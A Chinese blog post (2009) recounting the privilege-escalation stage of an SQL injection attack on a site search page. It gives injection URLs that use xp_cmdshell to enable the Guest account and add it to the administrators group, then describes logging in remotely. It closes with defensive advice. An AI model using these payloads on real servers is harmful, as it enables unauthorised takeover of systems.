网站运营
位置:首页>> 网站运营>> 典型的 SQL 注入过程(2)

典型的 SQL 注入过程(2)

作者:手气不错 来源:Gracecode.com 发布时间:2009-11-19 13:02:00 

标签:注入,sql,漏洞,服务器

提权

解禁 Guest 用户

http://foo/rss.aspx?keyword=lucky'));exec%09Master..xp_CMDShell%09'net%09user%09guest%09/active:yes';--

相当于服务器执行

net user guest /active:yes

再将 Guest 加入到管理员组

http://foo/rss.aspx?keyword=lucky'));exec%09Master.xp_CMDShell%09'net%09localgroup%09administrators%09guest%09/add';--

相当于服务器执行

net localgroup administrators guest /add

上述请求顺利执行成功,然后打开目标主机的远程登录,输入用户名“guest”密码为空登录,结果顺利登录 (运气和相貌都很重要 :P)。

重新关上 Guest 帐户,并通知主机管理员,至此攻击结束。

后记

正如上文所描述的,SQL 漏洞危害非常的巨大,但我相信国内很多中小站点还普遍存在着这样的漏洞。这里有些个人的不完全建议

  • 代码要对输入的参数做到充分的过滤,并尽可能得考虑极端情况

  • 错误信息尽可能的少,否则无关的人看不懂而有心的人就会提起兴趣

  • 不要以管理员的身份运行服务器进程

  • 某些情况下,net 命令对于攻击者而言就是“微软牌”的木马

  • 严格控制远程登录访问者的来源

  • 如果可能的情况下,不是很推荐使用 Windows 作为服务器操作系统

-- EOF --

0
投稿

猜你喜欢

手机版 网站运营 asp之家 www.aspxhome.com